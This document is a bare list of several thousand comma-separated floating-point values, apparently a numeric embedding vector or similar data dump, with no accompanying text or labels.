0.008419939316809177, -0.003669863101094961, 0.006395433563739061, -0.02602526545524597, 0.010430136695504189, 0.02838599681854248, -0.022233789786696434, -0.004521156661212444, 0.04117686301469803, 0.014822526834905148, 0.011531811207532883, 0.028715068474411964, -0.018742769956588745, -0.010766361840069294, 0.004403120372444391, -0.0350818857550621, 0.025224048644304276, 0.003737823339179158, 0.03405174985527992, -0.01815616525709629, 0.01272648386657238, -0.01067336369305849, -0.029172906652092934, -0.008491476066410542, -0.014443378895521164, -0.01411430723965168, 0.005461872089654207, -0.015809740871191025, -0.00997229851782322, -0.012433181516826153, -0.009528767317533493, 0.002047755056992173, -0.020402435213327408, -0.000028363418095977977, 0.009543074294924736, -0.020445358008146286, -0.001367256511002779, -0.03207731992006302, 0.014894063584506512, 0.01192526612430811, 0.008219635114073753, 0.0019207762088626623, 0.014078538864850998, 0.008183865807950497, -0.0325065441429615, 0.0022587899584323168, 0.026039574295282364, -0.027212785556912422, 0.020502587780356407, 0.011352968402206898, -0.003555403323844075, -0.016010046005249023, 0.01625327207148075, 0.03559695556759834, -0.015795433893799782, -0.007142998278141022, 0.002682648366317153, 0.004027549643069506, 0.0036269405391067266, 0.018785692751407623, 0.009614611975848675, -0.0013592084869742393, -0.014028462581336498, 0.0007019596523605287, 0.002265943679958582, 0.014865448698401451, -0.014994216151535511, 0.004592693876475096, -0.011782191693782806, -0.023564383387565613, -0.006652968004345894, -0.014507762156426907, -0.0002125998871633783, 0.008977930061519146, 0.011853729374706745, -0.02107488550245762, 0.034538205713033676, -0.028972603380680084, -0.005297336261719465, -0.007278919219970703, -0.01615311950445175, -0.0006603786023333669, 0.03988919407129288, 0.01506575383245945, -0.00789056345820427, 0.004657077603042126, 0.023163774982094765, 0.0018286720151081681, -0.01352770160883665, -0.00628455076366663, 0.02158995345234871, -0.029387518763542175, 0.03536803647875786, -0.0034069635439664125, -0.017140334472060204, 0.0062738205306231976, -0.0015076483832672238, 0.008927853778004646, 0.011031050235033035, 0.01365646906197071, 0.004045433830469847, -0.010580365546047688, -0.0006295281345956028, -0.007582952734082937, -0.013220091350376606, -0.009750532917678356, -0.005461872089654207, -0.003617998445406556, 0.04283652827143669, 0.010301370173692703, -0.012898173183202744, 0.0037092084530740976, -0.022033484652638435, -0.04071902483701706, -0.012669254094362259, -0.016782648861408234, -0.0009916856652125716, 0.0043601980432868, 0.007454185746610165, -0.017912937328219414, -0.03141917660832405, 0.02658325806260109, -0.013685083948075771, -0.008627397008240223, 0.04120548069477081, -0.006209436804056168, 0.0056228311732411385, 0.019014611840248108, 0.03428066894412041, 0.00914961937814951, 0.01563805155456066, -0.00561925396323204, 0.011002435348927975, -0.02842891961336136, 0.007797564845532179, 0.015308979898691177, -0.007532876916229725, -0.0013645738363265991, -0.014736682176589966, -0.01980152167379856, -0.02745601162314415, 0.02211933024227619, 0.002682648366317153, 0.01493698637932539, -0.004424581304192543, -0.010115372948348522, 0.00637754937633872, 0.010930897668004036, -0.02221948280930519, 0.0008763318182900548, -0.03682739660143852, -0.016725419089198112, -0.0022748857736587524, 0.0012009323108941317, -0.0004459902993403375, 0.003288927022367716, -0.02422252669930458, 0.014736682176589966, 0.02329254150390625, 0.026039574295282364, -0.013592084869742393, 0.003923820331692696, -0.013720852322876453, -0.0066815828904509544, 0.014071385376155376, -0.005172146018594503, -0.0065385084599256516, -0.02098904177546501, 0.011746423318982124, -0.01728340983390808, 0.0035697107668966055, 0.026239877566695213, 0.008713241666555405, 0.0014665144262835383, -0.013985540717840195, 0.004628462716937065, -0.03968888893723488, -0.01922922395169735, -0.01347047183662653, -0.005136377643793821, 0.002296346938237548, 0.007142998278141022, 0.003186986315995455, 0.004488965030759573, 0.010372906923294067, 0.013742313720285892, -0.027885235846042633, -0.015180213376879692, 0.01917199417948723, -0.0022713090293109417, -0.010909437201917171, 0.010179756209254265, -0.00570867583155632, -0.009585997089743614, 0.00026178176631219685, 0.00569436838850379, -0.017755554988980293, -0.01706879772245884, 0.0019780059810727835, -0.0016051179263740778, 0.024308370426297188, -0.004142009187489748, 0.0352821908891201, 0.022534245625138283, -0.01256910152733326, -0.027842313051223755, 0.024852054193615913, 0.00637397263199091, 0.0012805175501853228, -0.0025646118447184563, 0.017111720517277718, -0.029788127169013023, 0.015051445923745632, -0.017369253560900688, 0.006889041047543287, -0.001666818861849606, -0.006198706105351448, 0.002525266259908676, 0.02571050263941288, 0.010637595318257809, 0.030875494703650475, 0.006209436804056168, 0.0014665144262835383, 0.009779147803783417, 0.01193241961300373, -0.011245662346482277, 0.006524201016873121, 0.02915859967470169, 0.010143987834453583, 0.00566933024674654, 0.013048402033746243, -0.008169558830559254, -0.0032674658577889204, 0.0008079242543317378, -0.021475493907928467, 0.03347945213317871, -0.005469026044011116, 0.009135312400758266, -0.01625327207148075, 0.027227092534303665, -0.01123135443776846, -0.007375494576990604, -0.00426719943061471, -0.008892085403203964, -0.000193038911675103, -0.01496560126543045, 0.014343226328492165, 0.0007891457644291222, 0.007182343862950802, -0.027899542823433876, -0.026082495227456093, 0.00037422945024445653, -0.018213395029306412, 0.005254413932561874, -0.01603865996003151, 0.003762861480936408, 0.005050532519817352, 0.010244140401482582, 0.014107153750956059, 0.028972603380680084, -0.01666818931698799, 0.019357990473508835, -0.0005928652826696634, -0.014622222632169724, -0.001602435251697898, -0.01205403357744217, -0.00010719415877247229, 0.00285970326513052, 0.004167047329246998, -0.006892617791891098, 0.001961910165846348, -0.0025234778877347708, -0.0181418564170599, 0.0013216513907536864, -0.012361643835902214, -0.004968264605849981, -0.010608980432152748, 0.01190380472689867, -0.005161415319889784, 0.00498614925891161, 0.01944383606314659, 0.01480821892619133, 0.0024984399788081646, 0.02154703252017498, 0.001754452008754015, 0.0028310883790254593, -0.006041324231773615, 0.014121460728347301, -0.01774124801158905, 0.02947336435317993, 0.000749800237827003, 0.0035196347162127495, 0.00904946681112051, 0.01285525131970644, -0.016839878633618355, -0.00026334665017202497, -0.02370745874941349, 0.031390562653541565, -0.014951293356716633, 0.008033637888729572, 0.006756697315722704, -0.0031530060805380344, -0.004778691101819277, -0.018943075090646744, -0.02184748835861683, -0.00212108064442873, 0.008856317028403282, -0.011267122812569141, -0.011889497749507427, -0.005215068347752094, 0.004903881344944239, -0.00420281570404768, 0.029845356941223145, 0.0009639649651944637, 0.015695281326770782, 0.006409741006791592, 0.019915981218218803, 0.007633029017597437, 0.006263089831918478, 0.0008016647771000862, 0.01211126334965229, 0.013685083948075771, 0.013914003036916256, -0.0005445776041597128, 0.023621613159775734, 0.025681886821985245, 0.0019476027227938175, 0.016424961388111115, -0.011989650316536427, 0.007532876916229725, -0.007690258789807558, 0.02632572315633297, -0.002823934657499194, -0.021375343203544617, 0.004810882732272148, 0.01855677366256714, -0.018313545733690262, 0.0045819636434316635, 0.0046821157447993755, 0.0030582190956920385, 0.01855677366256714, -0.026154033839702606, 0.007028538733720779, -0.00637397263199091, 0.014107153750956059, -0.03362252563238144, 0.01256910152733326, 0.006492008920758963, -0.00285433791577816, -0.0038165145087987185, -0.022205175831913948, 0.005372450686991215, 0.01151750423014164, 0.00786910206079483, -0.00011758942127926275, -0.0015291095478460193, -0.010465906001627445, -0.0012769406894221902, -0.005068417172878981, -0.007153728976845741, -0.006484855432063341, 0.0010462328791618347, -0.011352968402206898, 0.027284322306513786, -0.013642161153256893, 0.004410273861140013, -0.012633485719561577, 0.009006544947624207, -0.004127701744437218, -0.008913546800613403, 0.03187701851129532, -0.002857914660125971, -0.0143217658624053, -0.007064307574182749, -0.009915068745613098, -0.01421445980668068, 0.009721918031573296, 0.001212557079270482, -0.004871689714491367, -0.008827701210975647, -0.017240487039089203, -0.0014665144262835383, 0.017011567950248718, -0.008276864886283875, 0.0019154109759256244, -0.01053744275122881, 0.019729984924197197, -0.011488888412714005, -0.0025342085864394903, 0.02406514436006546, 0.01984444446861744, 0.0007247621542774141, 0.009156772866845131, -0.002265943679958582, 0.006245205644518137, 0.0013511605793610215, -0.011073973029851913, -0.011689193546772003, 0.014750989153981209, -0.016281887888908386, 0.009550228714942932, -0.0230922382324934, 0.011202739551663399, 0.002802473260089755, -0.013763775117695332, 0.01892876625061035, -0.002807838609442115, 0.019873058423399925, 0.0008580003632232547, -0.027627700939774513, -0.009650380350649357, -0.003923820331692696, -0.005397488363087177, 0.008176712319254875, -0.03141917660832405, -0.020817352458834648, -0.013384627178311348, 0.0000449623039457947, 0.029959816485643387, -0.012891019694507122, -0.010458751581609249, -0.0001848791871452704, -0.020273668691515923, -0.023020699620246887, 0.007021385245025158, -0.0020155631937086582, 0.018842922523617744, -0.006195129361003637, 0.014529223553836346, -0.007954946719110012, -0.016482191160321236, -0.02067427709698677, -0.00033957857522182167, 0.0358831062912941, -0.006116438191384077, -0.011424505151808262, -0.014264536090195179, 0.0021550608798861504, -0.008098021149635315, 0.0009845319436863065, -0.0017848553834483027, -0.009700456634163857, -0.0014209094224497676, 0.01349908672273159, -0.006044900976121426, 0.0014226979110389948, -0.044610653072595596, 0.00008841561793815345, 0.006595738232135773, -0.008312633261084557, 0.011302892118692398, 0.012254337780177593, 0.004238584544509649, 0.015180213376879692, -0.015380517579615116, 0.011245662346482277, 0.0030385463032871485, 0.01000091340392828, 0.029129983857274055, 0.014257381670176983, 0.01948675885796547, 0.002979528158903122, 0.022291019558906555, -0.007618721574544907, 0.011553272604942322, -0.011653424240648746, -0.005819558631628752, -0.0032299086451530457, -0.017984474077820778, 0.01406423095613718, 0.009507305920124054, -0.012075494974851608, 0.006624353118240833, 0.0023643074091523886, -0.013821004889905453, -0.006917655933648348, 0.00869178120046854, -0.003913089632987976, 0.016525113955140114, -0.006159360520541668, 0.028500456362962723, 0.010930897668004036, -0.00498972600325942, -0.008799086324870586, 0.0010033105500042439, 0.005651446059346199, 0.016067275777459145, 0.0142216132953763, 0.0021568492520600557, 0.0016051179263740778, 0.007554337847977877, 0.0024090183433145285, 0.005172146018594503, -0.00941430777311325, 0.0044138506054878235, 0.014564991928637028, 0.01922922395169735, -0.011245662346482277, 0.006370395887643099, -0.008119482547044754, -0.01629619486629963, -0.006277397274971008, -0.02210502326488495, 0.0020334473811089993, -0.003653767053037882, -0.02134672738611698, 0.005372450686991215, 0.0033282723743468523, -0.010716286487877369, -0.0074327243492007256, -0.012168493121862411, -0.00716088293120265, -0.012576255947351456, -0.014407610520720482, -0.009156772866845131, -0.007075037807226181, -0.017369253560900688, 0.0003377901448402554, 0.006288127973675728, 0.009457229636609554, -0.014750989153981209, -0.0014557838439941406, -0.042865145951509476, -0.011939574033021927, 0.01206118706613779, -0.004564078990370035, 0.0013618911616504192, 0.011395890265703201, 0.0027112632524222136, -0.006999923847615719, 0.010122526437044144, -0.008276864886283875, 0.011138356290757656, -0.002707686508074403, 0.011031050235033035, -0.007178767118602991, -0.00020287527877371758, 0.03153363615274429, -0.008105174638330936, -0.0011705289361998439, -0.004481811076402664, -0.00003484648550511338, 0.019729984924197197, 0.0028292997740209103, -0.02103196270763874, 0.020659970119595528, -0.013563469983637333, -0.018213395029306412, 0.007318264804780483, -0.004020395688712597, -0.03110441379249096, 0.01424307469278574, 0.007547184359282255, -0.00922831054776907, -0.021761644631624222, -0.03367975726723671, 0.008770471438765526, 0.021203652024269104, 0.01007960457354784, 0.02236255630850792, 0.004421004559844732, -0.000022984149836702272, -0.004678539000451565, 0.0031136604957282543, -0.018113242462277412, -0.013112785294651985, -0.00789056345820427, 0.03757138550281525, 0.02297777682542801, 0.0035393075086176395, 0.005390334874391556, 0.003301445860415697, 0.01123850792646408, -0.007625875063240528, 0.00037870052619837224, -0.03582587465643883, 0.018628310412168503, -0.020803043618798256, 0.012125570327043533, -0.02293485589325428, 0.0045175799168646336, -0.0022570015862584114, 0.0007041951757855713, -0.017254794016480446, -0.009650380350649357, 0.0009720129310153425, -0.023821918293833733, -0.007271765731275082, 0.022534245625138283, 0.01077351626008749, 0.02529558539390564, 0.01555220689624548, 0.0014843987300992012, -0.0008003234397619963, -0.01128858420997858, -0.012232876382768154, -0.015351902693510056, -0.0040490105748176575, 0.00037221747334115207, 0.019930290058255196, -0.006016286090016365, 0.0009559170575812459, -0.0042350078001618385, 0.0007918283808976412, 0.001417332561686635, 0.0008320680935867131, -0.0024894976522773504, 0.02267732098698616, 0.0011445966083556414, -0.0016641361871734262, 0.018885845318436623, 0.026411566883325577, -0.002510958816856146, 0.0005468131857924163, 0.013649314641952515, 0.0017616057302802801, -0.031133029609918594, -0.004277930129319429, -0.00140749616548419, -0.005447564646601677, 0.00047795852879062295, -0.006846118718385696, -0.00014039193047210574, -0.009593150578439236, -0.006384703330695629, -0.009600304067134857, -0.003138698637485504, 0.000963070779107511, -0.0180417038500309, -0.0166538804769516, 0.004903881344944239, 0.02812846191227436, 0.01742648333311081, -0.01053744275122881, 0.017726941034197807, 0.010766361840069294, 0.0029848935082554817, -0.017297716811299324, 0.003737823339179158, -0.028300151228904724, 0.007289649918675423, 0.010601826012134552, -0.0014387937262654305, -0.018127549439668655, 0.01002952829003334, 0.023421308025717735, -0.008820547722280025, 0.009407153353095055, -0.00010557339555816725, -0.010966666974127293, -0.011732115410268307, -0.008763317950069904, -0.01738356240093708, 0.0020370243582874537, -0.013649314641952515, 0.014650837518274784, -0.012941095978021622, -0.0005857115611433983, 0.008877777494490147, 0.006109284702688456, 0.0036323058884590864, -0.007897716946899891, 0.0031172374729067087, -0.007075037807226181, -0.01493698637932539, -0.016496500000357628, 0.021790258586406708, -0.006828234530985355, -0.0036466133315116167, 0.02549589052796364, 0.006037747487425804, 0.010573211126029491, -0.0074327243492007256, -0.0018760653911158442, -0.01213272474706173, -0.004553348757326603, -0.00708219176158309, -0.0008182077435776591, 0.014665144495666027, -0.00987214595079422, 0.018113242462277412, 0.018184779211878777, 0.0028006848879158497, 0.0066171991638839245, -0.006678006146103144, -0.0007144786650314927, 0.000012546970538096502, 0.017712634056806564, 0.024551598355174065, 0.015967123210430145, -0.014865448698401451, -0.0000236827545450069, -0.012633485719561577, -0.004753652960062027, -0.005533409304916859, -0.01928645372390747, -0.004442465957254171, 0.010923744179308414, -0.013327397406101227, 0.0017338850302621722, 0.020602740347385406, 0.005100608803331852, -0.005565601401031017, -0.007125114090740681, -0.014979908242821693, -0.0442100465297699, 0.013906849548220634, 0.014894063584506512, 0.006245205644518137, -0.0180417038500309, -0.014765297062695026, -0.003503538900986314, -0.015323287807404995, 0.00995083712041378, 0.002468036487698555, -0.008319786749780178, -0.006073515862226486, -0.008913546800613403, 0.017083104699850082, -0.015351902693510056, 0.02812846191227436, 0.035968948155641556, 0.0001427392562618479, 0.001552359201014042, -0.00008606829942436889, -0.004134855233132839, 0.006556392647325993, 0.0035321537870913744, -0.008019329980015755, -0.0029187214095145464, 0.03496742621064186, 0.004206392914056778, 0.024666057899594307, 0.0014378995401784778, -0.010730593465268612, 0.010344292037189007, 0.03599756583571434, 0.00021830051264259964, 0.01421445980668068, -0.00216042622923851, -0.010809284634888172, 0.009371384978294373, 0.0007216324447654188, -0.002203348558396101, -0.01192526612430811, -0.02287762612104416, 0.00638828007504344, 0.019658448174595833, 0.0012214992893859744, 0.002804261865094304, 0.007797564845532179, 0.00925692543387413, 0.0026862253434956074, 0.026812177151441574, -0.009242617525160313, -0.015308979898691177, -0.017469406127929688, -0.01980152167379856, 0.007611567620187998, 0.015824047848582268, 0.024952206760644913, -0.030360426753759384, 0.018842922523617744, 0.005926864687353373, -0.0115461191162467, -0.017626788467168808, 0.004406697116792202, -0.011059665121138096, -0.014572146348655224, 0.016782648861408234, -0.021518416702747345, -0.013871080242097378, -0.01877138577401638, 0.0009416096145287156, 0.012232876382768154, 0.007704566232860088, -0.0028060502372682095, 0.015409132465720177, -0.004002511501312256, -0.0028060502372682095, -0.003306811209768057, -0.025581734254956245, -0.02632572315633297, -0.02519543282687664, 0.004349467344582081, 0.021117808297276497, -0.014894063584506512, -0.01326301321387291, -0.02684079110622406, -0.0014486301224678755, 0.005651446059346199, 0.0002966561878565699, -0.004381658975034952, -0.01835646852850914, -0.023120852187275887, 0.0051936074160039425, 0.002727359300479293, -0.006592161487787962, -0.027828006073832512, 0.03302161395549774, -0.0181418564170599, -0.007114383392035961, 0.024365602061152458, -0.009829224087297916, -0.011989650316536427, 0.003920243587344885, -0.005894672591239214, -0.01334170438349247, -0.010473059490323067, -0.026669101789593697, -0.01496560126543045, -0.0032281202729791403, -0.005404642317444086, -0.003541095880791545, -0.01128858420997858, 0.02525266446173191, -0.012354490347206593, -0.01954398863017559, -0.015165905468165874, 0.008749010972678661, 0.010072450153529644, 0.040032267570495605, 0.006534931715577841, 0.014522070065140724, 0.007733181118965149, 0.006463394034653902, -0.030989954248070717, -0.004792998544871807, -0.01477960404008627, -0.006248782388865948, -0.0016274733934551477, -0.0009062880417332053, -0.013556316494941711, -0.008248250000178814, 0.04020395874977112, -0.000010507039405638352, -0.01400700118392706, 0.01269786898046732, 0.006914079189300537, -0.014443378895521164, 0.004034703131765127, 0.01573820412158966, 0.0006822869181632996, -0.007103653158992529, 0.01917199417948723, 0.006792465690523386, -0.002450152300298214, 0.004750076215714216, -0.0026289953384548426, 0.017083104699850082, -0.02525266446173191, -0.0348815843462944, -0.022806087508797646, -0.009886453859508038, -0.031133029609918594, 0.01825631596148014, -0.0045175799168646336, 0.01861400343477726, 0.01128858420997858, -0.001836719922721386, 0.016854185611009598, 0.018370775505900383, -0.0032585235312581062, -0.006463394034653902, 0.020531201735138893, 0.0058875191025435925, 0.003151217708364129, 0.0034498858731240034, -0.015080060809850693, -0.02200487069785595, 0.018542464822530746, -0.019615525379776955, -0.004542618058621883, -0.005408219061791897, -0.00052401062566787, 0.006177245173603296, -0.0015013888478279114, -0.0013538432540372014, 0.016110198572278023, -0.02493789978325367, -0.008727549575269222, -0.005976940505206585, -0.016525113955140114, 0.02622557058930397, 0.00920684915035963, -0.0018036339897662401, 0.019715677946805954, -0.0025288432370871305, -0.0061700912192463875, -0.012769406661391258, 0.0023303271736949682, 0.025696195662021637, 0.00010026398376794532, -0.020602740347385406, -0.009035159833729267, -0.016682496294379234, 0.023421308025717735, 0.0004739345458801836, 0.0015112252440303564, -0.019014611840248108, -0.01277656015008688, 0.003723515896126628, -0.0010721650905907154, 0.009035159833729267, -0.0010194063652306795, 0.00917823426425457, 0.0036251521669328213, -0.008226788602769375, -0.003913089632987976, 0.019973210990428925, 0.005855327006429434, 0.024193910881876945, 0.001868911669589579, -0.006255935877561569, -0.01477960404008627, 0.02077442966401577, 0.01493698637932539, -0.013570624403655529, 0.011739269830286503, 0.009407153353095055, -0.01625327207148075, -0.009214002639055252, -0.00104802125133574, 0.0018402967834845185, 0.009199695661664009, -0.0013538432540372014, -0.022634398192167282, -0.0049468036741018295, -0.002589649986475706, 0.007547184359282255, 0.01123135443776846, -0.014278843067586422, 0.02210502326488495, -0.007525722961872816, 0.00930700171738863, 0.018857229501008987, -0.015337594784796238, 0.008305479772388935, -0.0010015220614150167, 0.002577130915597081, -0.005290182773023844, 0.011009588837623596, -0.025109589099884033, -0.013592084869742393, 0.002196194836869836, -0.0010113584576174617, -0.01339178066700697, -0.0008477168739773333, -0.031590867787599564, 0.02880091406404972, -0.01208264846354723, -0.012411720119416714, -0.002707686508074403, -0.0035321537870913744, -0.006660121958702803, 0.012325875461101532, -0.031848400831222534, -0.0073969559744000435, -0.016067275777459145, 0.002580707659944892, 0.03007427603006363, 0.013921156525611877, -0.013792390003800392, 0.004481811076402664, -0.010201217606663704, -0.01599573902785778, 0.010716286487877369, -0.0006934645934961736, -0.004403120372444391, 0.005089878104627132, 0.0022552129812538624, -0.02741308882832527, -0.005243683233857155, -0.001701693283393979, -0.027899542823433876, 0.013735160231590271, 0.0051113395020365715, -0.03748553991317749, 0.011431658640503883, 0.002278462750837207, -0.010437291115522385, 0.011395890265703201, -0.010172602720558643, -0.021890411153435707, -0.0034302130807191133, 0.018385084345936775, -0.0006867579650133848, 0.012547641061246395, 0.00107037671841681, 0.010065296664834023, 0.006345357745885849, -0.004338736645877361, -0.011581887491047382, -0.006291704718023539, 0.019114764407277107, -0.007854794152081013, -0.00001538331162009854, 0.003517846344038844, 0.00429581431671977, -0.021361034363508224, 0.023421308025717735, 0.011882344260811806, 0.021919025108218193, 0.013098478317260742, -0.006556392647325993, -0.02561035007238388, 0.010701978579163551, -0.002587861381471157, -0.0010140411322936416, 0.020817352458834648, -0.015266058035194874, -0.003662709379568696, -0.014157230034470558, -0.0011106164893135428, -0.012297260574996471, 0.014615068212151527, 0.029530594125390053, -0.0071322680450975895, -0.004045433830469847, -0.001619425369426608, 0.020788736641407013, 0.0030600077006965876, -0.011918112635612488, -0.0016131659504026175, 0.004514003172516823, 0.025624657049775124, 0.008842009119689465, -0.002956278622150421, -0.00565502280369401, -0.009314155206084251, -0.0064347791485488415, -0.02729862928390503, 0.006856849417090416, 0.003923820331692696, -0.00420281570404768, 0.016181735321879387, -0.013477625325322151, 0.007847640663385391, 0.009271232411265373, -0.005118492990732193, 0.006760274060070515, -0.0014951294288039207, 0.009314155206084251, 0.0230922382324934, 0.009757686406373978, -0.006266666576266289, -0.004943226929754019, -0.025796346366405487, -0.021146422252058983, 0.000905840948689729, -0.017512328922748566, -0.0020531201735138893, -0.01136012189090252, -0.003142275381833315, 0.007826179265975952, 0.000083441540482454, 0.019815828651189804, 0.02174733579158783, -0.006957001518458128, 0.016825571656227112, 0.016110198572278023, 0.016568036749958992, -0.01918630115687847, 0.020659970119595528, 0.012447488494217396, 0.02247701585292816, -0.0038272449746727943, 0.008212480694055557, 0.009729071520268917, 0.002242694143205881, -0.006996347103267908, -0.0027434551157057285, 0.010337138548493385, -0.011553272604942322, -0.00419208500534296, 0.009578843601047993, 0.006874733604490757, -0.001527321175672114, 0.014665144495666027, -0.0048645357601344585, -0.021361034363508224, 0.0002693826099857688, 0.014042770490050316, -0.0005579908611252904, 0.0028382421005517244, -0.037657231092453, 0.00316910189576447, -0.017755554988980293, 0.0033050228375941515, -0.007668797392398119, -0.01545205432921648, 0.0034069635439664125, 0.00982206966727972, -0.012998325750231743, -0.006277397274971008, -0.00035679223947227, -0.005179299972951412, 0.014407610520720482, 0.021103501319885254, 0.0035643454175442457, 0.003306811209768057, -0.01085220742970705, -0.004167047329246998, 0.014557838439941406, -0.001694539561867714, -0.007690258789807558, -0.008033637888729572, -0.0003064925840590149, 0.017469406127929688, -0.00021606497466564178, -0.008090867660939693, 0.004914612043648958, -0.010637595318257809, 0.0004623097484000027, -0.004116971045732498, -0.0010569634614512324, 0.019257837906479836, -0.0011195585830137134, 0.031905632466077805, 0.011689193546772003, 0.009507305920124054, -0.006470547989010811, 0.028099847957491875, -0.01143881306052208, -0.02148980274796486, -0.010737746953964233, 0.0064347791485488415, -0.0027738583739846945, 0.007990715093910694, -0.010337138548493385, -0.015967123210430145, 0.018885845318436623, -0.00285970326513052, -0.028514763340353966, 0.017240487039089203, -0.008870624005794525, 0.017254794016480446, -0.0010793189285323024, 0.006230898201465607, 0.017340639606118202, -0.00859162863343954, 0.008520090952515602, -0.0033246956299990416, 0.0031208142172545195, -0.012447488494217396, 0.01639634743332863, -0.008105174638330936, 0.0020048324950039387, -0.001587233622558415, 0.009550228714942932, -0.024980822578072548, 0.004657077603042126, 0.013942617923021317, -0.01599573902785778, -0.02555312030017376, -0.014207306317985058, -0.004621308762580156, 0.005937594920396805, 0.0036072679795324802, 0.028986910358071327, -0.0016435692086815834, 0.011710654012858868, 0.017755554988980293, -0.009192542172968388, 0.009042313322424889, 0.0035929603036493063, -0.0011034626513719559, -0.0021979832090437412, -0.014042770490050316, -0.0034105402883142233, 0.0018581810873001814, -0.015566514804959297, -0.0017553463112562895, -0.0050111874006688595, 0.028858143836259842, 0.008863470517098904, 0.01716895028948784, -0.004900304600596428, -0.013949771411716938, -0.006914079189300537, -0.009757686406373978, -0.004038279876112938, -0.00771171972155571, 0.026812177151441574, 0.00866316631436348, -0.008505783975124359, -0.0039059361442923546, -0.004367351531982422, 0.024909283965826035, 0.006899771746248007, -0.009271232411265373, -0.013477625325322151, -0.014572146348655224, 0.004953957162797451, 0.0018456621328368783, -0.005354566033929586, 0.037971992045640945, 0.01917199417948723, -0.025109589099884033, 0.000142851029522717, -0.021017655730247498, 0.0015827625757083297, 0.004388812929391861, -0.003365829586982727, -0.0156094366684556, 0.0003156582824885845, -0.028471842408180237, 0.010916590690612793, 0.003011720022186637, -0.027642009779810905, -0.0016534056048840284, -0.005007610190659761, -0.004370928276330233, 0.0008495053043588996, 0.004471080843359232, -0.0048645357601344585, 0.01968706212937832, -0.008877777494490147, -0.048874277621507645, 0.007625875063240528, 0.004596271086484194, 0.0004178224771749228, 0.01748371310532093, -0.014200151897966862, 0.016267579048871994, 0.004885997157543898, -0.00708219176158309, -0.009507305920124054, -0.008834855630993843, -0.030875494703650475, 0.012168493121862411, 0.00982206966727972, 0.01362785417586565, 0.006889041047543287, 0.0003243768878746778, 0.0035500379744917154, 0.010387214832007885, 0.004174200817942619, 0.003877321258187294, 0.008362709544599056, -0.019672755151987076, -0.0021157152950763702, 0.006470547989010811, -0.006960578262805939, 0.005486910231411457, -0.017140334472060204, -0.009478691034018993, -0.004628462716937065, 0.007468493189662695, 0.01141735166311264, 0.000894663215149194, 0.007675951346755028, -0.02097473293542862, -0.024050837382674217, 0.00020030440646223724, -0.008005023002624512, -0.0065993149764835835, 0.0009818492690101266, 0.015080060809850693, -0.007404109463095665, 0.00124027777928859, 0.0030045663006603718, 0.00250022835098207, -0.004953957162797451, -0.000010947161172225606, 0.02416529692709446, -0.004106240347027779, 0.004810882732272148, -0.011674885638058186, 0.004038279876112938, 0.006792465690523386, -0.011825114488601685, -0.0014253804692998528, -0.002215867629274726, -0.009235464036464691, -0.0018832192290574312, -0.004463926889002323, -0.011810806579887867, 0.011646270751953125, -0.001958333421498537, 0.00023875570332165807, -0.008627397008240223, 0.006892617791891098, 0.016167428344488144, 0.014235921204090118, 0.018342161551117897, 0.022248096764087677, 0.00432085245847702, -0.007690258789807558, 0.00997945200651884, 0.020888889208436012, -0.0003228120331186801, 0.0029956239741295576, 0.004134855233132839, -0.021046271547675133, 0.015494977124035358, 0.0033604642376303673, 0.015909893438220024, 0.022920547053217888, -0.0033550988882780075, -0.00941430777311325, 0.0052293757908046246, -0.0034749237820506096, -0.003158371429890394, 0.020230745896697044, 0.015194520354270935, -0.0013073439477011561, 0.019143378362059593, 0.01599573902785778, 0.003995357546955347, -0.010701978579163551, 0.01639634743332863, 0.014500608667731285, 0.0005642503965646029, -0.0033372147008776665, -0.0014378995401784778, 0.013134246692061424, 0.013620699755847454, 0.0037914763670414686, -0.016081582754850388, 0.015824047848582268, -0.00010065520473290235, -0.004735768772661686, -0.013863926753401756, 0.00047929983702488244, -0.016696803271770477, 0.006255935877561569, -0.02386483922600746, 0.021518416702747345, 0.019729984924197197, 0.021418264135718346, -0.00941430777311325, -0.009643226861953735, -0.004431735258549452, 0.010215525515377522, 0.005143531132489443, -0.02812846191227436, -0.013212937861680984, -0.021175038069486618, 0.010737746953964233, -0.0044138506054878235, -0.012340182438492775, 0.0006885463953949511, 0.002507382072508335, 0.005587062332779169, 0.006123592145740986, -0.01067336369305849, -0.015308979898691177, 0.028185691684484482, 0.01625327207148075, -0.0007269977359101176, 0.01296255737543106, 0.010351445525884628, -0.02329254150390625, 0.008090867660939693, -0.017612481489777565, 0.029645053669810295, -0.0073325722478330135, -0.022019177675247192, -0.01282663643360138, 0.01069482509046793, -0.00054502475541085, -0.005143531132489443, 0.0069677322171628475, -0.006477701477706432, 0.013713698834180832, 0.004853805061429739, 0.005079147405922413, -0.007303957361727953, 0.009614611975848675, -0.0036770168226212263, 0.01259771641343832, 0.009786301292479038, -0.002602169057354331, 0.008241095580160618, 0.0016033295542001724, -0.005769482348114252, -0.00007880279736127704, 0.0014486301224678755, 0.01639634743332863, -0.012891019694507122, 0.018428005278110504, 0.002757762558758259, -0.0009335616487078369, -0.02087458223104477, 0.0007922754739411175, -0.0029330288525670767, 0.010201217606663704, 0.001559512922540307, 0.02458021230995655, -0.008291171863675117, 0.008098021149635315, -0.004159893374890089, 0.01506575383245945, -0.014636529609560966, -0.01732633262872696, 0.010008066892623901, -0.004260045476257801, 0.001836719922721386, 0.005511948373168707, 0.005497640930116177, -0.010344292037189007, -0.003453462617471814, -0.01483683381229639, 0.01619604229927063, 0.0087203960865736, -0.008784779347479343, 0.008362709544599056, 0.03682739660143852, 0.025109589099884033, 0.004835920874029398, 0.011767884716391563, 0.007085768505930901, 0.010637595318257809, -0.0022015601862221956, -0.0017177892150357366, -0.020888889208436012, -0.006277397274971008, 0.017912937328219414, 0.012418873608112335, 0.00107037671841681, -0.001584550947882235, -0.0052114916034042835, 0.0016855973517522216, 0.009063774719834328, 0.004009664990007877, 0.0028632800094783306, 0.013320243917405605, 0.010995281860232353, 0.008985083550214767, -0.003988204058259726, 0.011109741404652596, -0.002278462750837207, -0.01352770160883665, -0.00701780803501606, 0.022548554465174675, -0.0020692162215709686, 0.03419482335448265, 0.010787823237478733, -0.003641247982159257, 0.005647869314998388, 0.0009541286271996796, -0.01922922395169735, 0.0038737442810088396, 0.01406423095613718, 0.007461339235305786, 0.008927853778004646, 0.018227702006697655, -0.0031029300298541784, -0.00784048717468977, 0.012361643835902214, 0.015165905468165874, 0.01069482509046793, 0.014979908242821693, 0.0033801370300352573, -0.009521613828837872, 0.010265600867569447, -0.008884931914508343, 0.025538813322782516, 0.002242694143205881, -0.002233751816675067, -0.0032030821312218904, -0.022849010303616524, 0.00212108064442873, 0.03963165730237961, -0.01136012189090252, 0.0010328196221962571, -0.009636073373258114, -0.006982039660215378, -0.005662176758050919, -0.028815221041440964, 0.0007627663435414433, 